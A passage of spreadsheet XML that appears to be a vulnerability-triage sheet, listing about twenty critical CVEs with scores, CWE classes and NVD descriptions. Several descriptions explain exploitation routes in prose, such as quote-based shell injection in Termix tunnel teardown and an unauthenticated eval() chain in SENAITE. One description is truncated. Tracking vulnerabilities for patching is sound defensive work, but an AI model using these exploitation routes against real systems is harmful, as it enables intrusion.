          <t>CVE-2026-52924</t>
        </is>
      </c>
      <c r="C174" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D174" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E174" s="5" t="inlineStr"/>
      <c r="F174" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G174" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H174" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I174" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-825</t>
        </is>
      </c>
      <c r="L174" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: purge outqueue on stale COOKIE-ECHO handling
sctp_stream_update() is only invoked when the association is moved into
COOKIE_WAIT during association setup/reconfiguration. In this path, the
outbound stream scheduler state (stream-&gt;out_curr) is expected to be
clean, since no user data should have been transmitted yet unless the
state machine has already partially progressed.
However, a corner case exists in sctp_sf_do_5_2_6_stale(): when a
Stale Cookie ERROR is received, the association is rolled back from
COOKIE_ECHOED to COOKIE_WAIT. In this scenario, user data may already
have been queued and even bundled with the COOKIE-ECHO chunk.
During the rollback, sctp_stream_update() frees the old stream table
and installs a new one, but it does not invalidate stream-&gt;out_curr.
As a result, out_curr may still point to a freed sctp_stream_out
entry from the previous stream state.
Later, SCTP scheduler dequeue paths (FCFS, RR, PRIO, etc.) rely on
stream-&gt;out_curr-&gt;ext, which can lead to use-after-free once the old
stream state has been released via sctp_stream_free().
This results in crashes such as (reported by Yuqi):
  BUG: KASAN: slab-use-after-free in sctp_sched_fcfs_dequeue+0x13a/0x140
  Read of size 8 at addr ff1100004d4d3208 by task mini_poc/9312
  CPU: 1 UID: 1001 PID: 9312 Comm: mini_poc Not tainted
     7.1.0-rc1-00305-gbd3a4795d574 #5 PREEMPT(full)
   sctp_sched_fcfs_dequeue+0x13a/0x140
   sctp_outq_flush+0x1603/0x33e0
   sctp_do_sm+0x31c9/0x5d30
   sctp_assoc_bh_rcv+0x392/0x6f0
   sctp_inq_push+0x1db/0x270
   sctp_rcv+0x138d/0x3c10
Fix this by fully purging the association outqueue when handling the
Stale Cookie case. This ensures all pending transmit and retransmit
state is dropped, and any scheduler cached pointers are invalidated,
making it safe to rebuild stream state during COOKIE_WAIT restart.
Updating only stream-&gt;out_curr would be insufficient, since queued
and retransmittable data would still reference the old stream state and
trigger later use-after-free in dequeue paths.</t>
        </is>
      </c>
      <c r="M174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52924</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53002</t>
        </is>
      </c>
      <c r="C175" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D175" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E175" s="5" t="inlineStr"/>
      <c r="F175" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G175" s="5" t="inlineStr">
        <is>
          <t>linux kernel, f5</t>
        </is>
      </c>
      <c r="H175" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I175" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L175" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: conntrack: remove sprintf usage
Replace it with scnprintf, the buffer sizes are expected to be large enough
to hold the result, no need for snprintf+overflow check.
Increase buffer size in mangle_content_len() while at it.
BUG: KASAN: stack-out-of-bounds in vsnprintf+0xea5/0x1270
Write of size 1 at addr [..]
 vsnprintf+0xea5/0x1270
 sprintf+0xb1/0xe0
 mangle_content_len+0x1ac/0x280
 nf_nat_sdp_session+0x1cc/0x240
 process_sdp+0x8f8/0xb80
 process_invite_request+0x108/0x2b0
 process_sip_msg+0x5da/0xf50
 sip_help_tcp+0x45e/0x780
 nf_confirm+0x34d/0x990
 [..]</t>
        </is>
      </c>
      <c r="M175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53002</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53006</t>
        </is>
      </c>
      <c r="C176" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D176" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E176" s="5" t="inlineStr"/>
      <c r="F176" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G176" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H176" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I176" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-825</t>
        </is>
      </c>
      <c r="L176" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix possible UAF in icmpv6_rcv()
Caching saddr and daddr before pskb_pull() is problematic
since skb-&gt;head can change.
Remove these temporary variables:
- We only access &amp;ipv6_hdr(skb)-&gt;saddr and &amp;ipv6_hdr(skb)-&gt;daddr
  when net_dbg_ratelimited() is called in the slow path.
- Avoid potential future misuse after pskb_pull() call.</t>
        </is>
      </c>
      <c r="M176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53006</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53545</t>
        </is>
      </c>
      <c r="C177" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D177" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E177" s="5" t="inlineStr"/>
      <c r="F177" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L177" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.3.2, the DELETE /ssh/tunnel/disconnect/:tunnelName teardown path in src/backend/ssh/tunnel.ts interpolates endpointPort, sourcePort, endpointUsername, and endpointIP into single-quoted pkill -f patterns. An authenticated user who can edit a tunnel host field can include a single quote to terminate the pattern and append a shell command, which executes when the tunnel is disconnected. Successful exploitation runs arbitrary commands on the source SSH host with the privileges of the connected SSH account. This issue is fixed in version 2.3.2.</t>
        </is>
      </c>
      <c r="M177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53545</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53611</t>
        </is>
      </c>
      <c r="C178" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D178" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E178" s="5" t="inlineStr"/>
      <c r="F178" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>Looking Glass is a modern, stateless network-diagnostic platform — a single self-contained Go binary that fronts a fleet of routers over SSH and exposes ping / traceroute / BGP lookups through a gRPC (ConnectRPC) API, an embedded SvelteKit web UI, and a lg-cli client. Prior to version 1.3.5, there is an OS Command Injection vulnerability resulting from an unanchored regular expression in the input validation layer. This issue has been patched in version 1.3.5.</t>
        </is>
      </c>
      <c r="M178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53611</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54569</t>
        </is>
      </c>
      <c r="C179" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D179" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E179" s="5" t="inlineStr"/>
      <c r="F179" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G179" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-95</t>
        </is>
      </c>
      <c r="L179" s="5" t="inlineStr">
        <is>
          <t>SENAITE.CORE is the core framework for the SENAITE laboratory information management system. From 2.0.0 to 2.6.0, the SENAITE.CORE JSON API permits unauthenticated remote code execution through a two-request chain involving missing authorization and unsafe evaluation. The state-changing routes in src/bika/lims/jsonapi/update.py, including update, update_many, remove, doActionFor, doActionFor_many, and getusers, do not enforce the senaite.core: Access JSON API permission before resolving attacker-selected objects. In src/bika/lims/jsonapi/init.py, set_fields_from_request passes raw request values for RecordsField and RecordField instances to eval() before field mutator write-permission checks execute. An anonymous attacker can discover the bika_setup object identifier through @@uuid, send a value such as RejectionReasons to /@@API/update, and execute arbitrary Python in the Zope worker before a later mutation failure rolls back ZODB changes. The same unsafe evaluation pattern is present in src/senaite/core/browser/fields/record.py and src/senaite/core/browser/fields/records.py. Successful exploitation can expose or modify laboratory data, files, and accounts and can disrupt the service.</t>
        </is>
      </c>
      <c r="M179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54569</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55546</t>
        </is>
      </c>
      <c r="C180" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D180" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E180" s="5" t="inlineStr"/>
      <c r="F180" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G180" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L180" s="5" t="inlineStr">
        <is>
          <t>QWED-MCP i</t>
        </is>
      </c>
      <c r="M180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55546</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55559</t>
        </is>
      </c>
      <c r="C181" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D181" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E181" s="5" t="inlineStr"/>
      <c r="F181" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G181" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs inserts templateArgs from POST /api/instances and PATCH /api/instances/{instance} into YAML through VarStatement.append in yamcs-core/src/main/java/org/yamcs/templating/VarStatement.java without YAML-context escaping. The rendered configuration is parsed by YamcsServer.createInstance and loaded by YamcsServerInstance, allowing an attacker to inject a services entry for org.yamcs.ProcessRunner. Deployments without security.yaml expose the operation through the guest superuser, while secured deployments require SystemPrivilege.CreateInstances. Successful exploitation executes commands as the Yamcs service account. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55559</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56207</t>
        </is>
      </c>
      <c r="C182" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D182" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E182" s="5" t="inlineStr"/>
      <c r="F182" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G182" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H182" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I182" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L182" s="5" t="inlineStr">
        <is>
          <t>Signature of Bearer token is not verified in last step of SAML2 authentication for Impala's hs2-http interface, allowing altering user name and acting as another user.
This issue affects Apache Impala: &gt;=4.0.0.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="M182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56207</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57967</t>
        </is>
      </c>
      <c r="C183" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D183" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E183" s="5" t="inlineStr"/>
      <c r="F183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G183" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L183" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can craft a CORE protocol SESSION_REATTACH packet to steal an existing session and assume ongoing execution of the previously authenticated session.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57967</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58240</t>
        </is>
      </c>
      <c r="C184" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D184" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E184" s="5" t="inlineStr"/>
      <c r="F184" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G184" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="L184" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Message Server does not sufficiently validate the authenticity of internal application server components during registration. An unauthenticated attacker with network access to the affected service could exploit this weakness to register an unauthorized component and potentially perform unauthorized actions within the application environment, resulting in a high impact on the confidentiality, integrity, and availability of the affected system.</t>
        </is>
      </c>
      <c r="M184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58822</t>
        </is>
      </c>
      <c r="C185" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D185" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E185" s="5" t="inlineStr"/>
      <c r="F185" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="L185" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of ftsmooth.c, there is a possible memory safety issue due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58822</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61808</t>
        </is>
      </c>
      <c r="C186" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D186" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E186" s="5" t="inlineStr"/>
      <c r="F186" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L186" s="5" t="inlineStr">
        <is>
          <t>LightRAG provides simple and fast retrieval-augmented generation. Through version 1.5.4, the LightRAG API server binds to all network interfaces with authentication disabled by default, allowing an unauthenticated network attacker to read indexed document content, upload or delete documents, modify the knowledge graph, cancel pipelines, clear caches, and consume LLM resources. This issue is mitigated in version 1.5.5rc1.</t>
        </is>
      </c>
      <c r="M186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61808</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62916</t>
        </is>
      </c>
      <c r="C187" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D187" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E187" s="5" t="inlineStr"/>
      <c r="F187" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G187" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H187" s="5" t="inlineStr">
        <is>
          <t>microsoft:entra_id</t>
        </is>
      </c>
      <c r="I187" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L187" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass using an alternate path or channel in Microsoft Entra ID allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62916</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63223</t>
        </is>
      </c>
      <c r="C188" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D188" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E188" s="5" t="inlineStr"/>
      <c r="F188" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L188" s="5" t="inlineStr">
        <is>
          <t>CodeIgniter is a PHP full-stack web framework. Prior to 4.7.4, the is_image and mime_in upload validation rules do not independently enforce a safe client filename extension, allowing a remote attacker to upload executable content when an application preserves the client filename and stores uploads in a web-accessible script-enabled directory. Applications are impacted when they validate uploads using is_image or mime_in without an independent safe extension check (such as ext_in on patched versions), save uploaded files using the client-supplied filename, and place uploads in a web-accessible directory where PHP files can execute. This issue is fixed in version 4.7.4.</t>
        </is>
      </c>
      <c r="M188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63223</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66302</t>
        </is>
      </c>
      <c r="C189" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D189" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E189" s="5" t="inlineStr"/>
      <c r="F189" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L189" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67868</t>
        </is>
      </c>
      <c r="C190" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D190" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E190" s="5" t="inlineStr"/>
      <c r="F190" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L190" s="5" t="inlineStr">
        <is>
          <t>A heap-based out-of-bounds write vulnerability exists in S2OPC 1.7.3 in server-side EventFilter handling during CreateMonitoredItems processing. This allows a remote attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67868</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67917</t>
        </is>
      </c>
      <c r="C191" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D191" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E191" s="5" t="inlineStr"/>
      <c r="F191" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L191" s="5" t="inlineStr">
        <is>
          <t>zuraCast versions up to and including 0.23.7 contain a SQL injection vulnerability in the backup restore functionality. The `azuracast:restore` command executes the `db.sql` file extracted from a backup archive without any content validation or sanitization. This allows a remote attacker to escalate privileges</t>
        </is>
      </c>
      <c r="M191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67917</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67919</t>
        </is>
      </c>
      <c r="C192" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D192" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E192" s="5" t="inlineStr"/>
      <c r="F192" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G192" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L192" s="5" t="inlineStr">
        <is>
          <t>An issue in Halo 2.25.4 allows a remote attacker to execute arbitrary code via the PluginEndpoint.java, installFromUri method, and DefaultPluginApplicationContextFactory components</t>
        </is>
      </c>
      <c r="M192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67919</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67967</t>
        </is>
      </c>
      <c r="C193" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D193" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E193" s="5" t="inlineStr"/>
      <c r="F193" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L193" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in Tenda W20E V16.01.0.6(2782) allows an attacker to execute arbitrary code. This is an incomplete fix for CVE-2025-44867 and CVE-2026-36819</t>
        </is>
      </c>
      <c r="M193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67967</t>
        </is>
      </c>
    </row>
    <row r="194">
